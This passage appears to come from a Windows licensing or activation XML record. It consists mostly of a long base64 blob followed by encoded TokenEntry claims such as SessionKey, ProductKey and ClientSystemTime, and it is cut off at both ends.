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</Value></TokenEntry></Values></UseKey><Claims><Values xmlns:q1=\"http://schemas.xmlsoap.org/ws/2004/04/security/trust\" soapenc:arrayType=\"q1:TokenEntry[17]\"><TokenEntry><Name>SessionKey</Name><Value>NrQ883VaozIQCcS1YCGswK/wDLbBtdWkPZgRC+5BZ9U8vyVjjU1H/4bW1M1I840SSOtoqa/Fx2b8nSku/9PuU9zbUXcXegLDa7hrJE5FJuZ9R5eaoSqUlU4rTV7ryC7HwSm/TDe+uetdEvMhZjh715duEhOKqSqopPRomIUNLm9bXpuQCFKhrfc95s3Qd9WIhyrZpJR8Uh5en7w5j/1+jJ0fN8qVNztGGniMri6k9I7BWx98oD7BwCLriqhhX72dMeGgN8mmlnF72oiCEhhN5TDufHMrG58D3qAdQFg4aOVqDpMpHXSNqO1FJXpB/LFue22wdDFFgbEF7YWb/aAPUg==</Value></TokenEntry><TokenEntry><Name>BindingType</Name><Value>3+WNUl/E04Vxt+Mky92FJIKmI0oBpRDCjXZQv7ABor0=</Value></TokenEntry><TokenEntry><Name>Binding</Name><Value>j6X9dwRwVXiWP0SZZSfpoKVORxNTXt4ZStyiU8h/Cz136XxpX3+G15hl8C5V0q+c7UWPDiAthEyLRludjH9fTQ==</Value></TokenEntry><TokenEntry><Name>ProductKey</Name><Value>JFQObmITLhLRaiU7jTq6L8c6llzFZunxfaRGUCYy1tQ=</Value></TokenEntry><TokenEntry><Name>ProductKeyType</Name><Value>3+WNUl/E04Vxt+Mky92FJCJAXuil1lie4VlRrwqcByA=</Value></TokenEntry><TokenEntry><Name>ProductKeyActConfigId</Name><Value>55dRYEeFXHYg2vxP0rmgJHntYJzsSL5828qCxbTjY2WLVdXKfrXsltOWxBkQXTA8ADNRwGX9AsqJTc3ZXrfxmRv8X1JFnctGSUFUzWt4Qo0=</Value></TokenEntry><TokenEntry><Name>SppSvcVersion</Name><Value>ia0fbL/642yKlTaqeZGb7g==</Value></TokenEntry><TokenEntry><Name>otherInfoPublic.licenseCategory</Name><Value>x6ElrCbLp/HSvXxANTXfFeV8Oqft1VSUXpnK5AKscw8=</Value></TokenEntry><TokenEntry><Name>otherInfoPrivate.licenseCategory</Name><Value>x6ElrCbLp/HSvXxANTXfFQSmISAvOgFmssmZydnJVTw=</Value></TokenEntry><TokenEntry><Name>otherInfoPublic.sysprepAction</Name><Value>dgO3TBrhjZhtnPAwWTSJeA==</Value></TokenEntry><TokenEntry><Name>otherInfoPrivate.sysprepAction</Name><Value>dgO3TBrhjZhtnPAwWTSJeA==</Value></TokenEntry><TokenEntry><Name>ClientInformation</Name><Value>jiN/BhnOwfjjdBUYEfvVU54cfM9ZFrSNuk6DpLgYMdeHRKaMmHDEWtbnPOsPJbXOuypSsqYC6gpj4LfknpILLQ==</Value></TokenEntry><TokenEntry><Name>ReferralInformation</Name><Value>XKpZy/ucsFxDSEPnGsTq19XdzywowGc8MNY6JwJfi+IwWNi52rvllr8gOP1c3DSe/Jg98SJdeas1biag5jhgNA==</Value></TokenEntry><TokenEntry><Name>ClientSystemTime</Name><Value>SNtd3xTDBT+McfeNOwdZJ6rnC54VBQgRp55s1kn0EdE=</Value></TokenEntry><TokenEntry><Name>ClientSystemTimeUtc</Name><Value>SNtd3xTDBT+McfeNOwdZJ6rnC54VBQgRp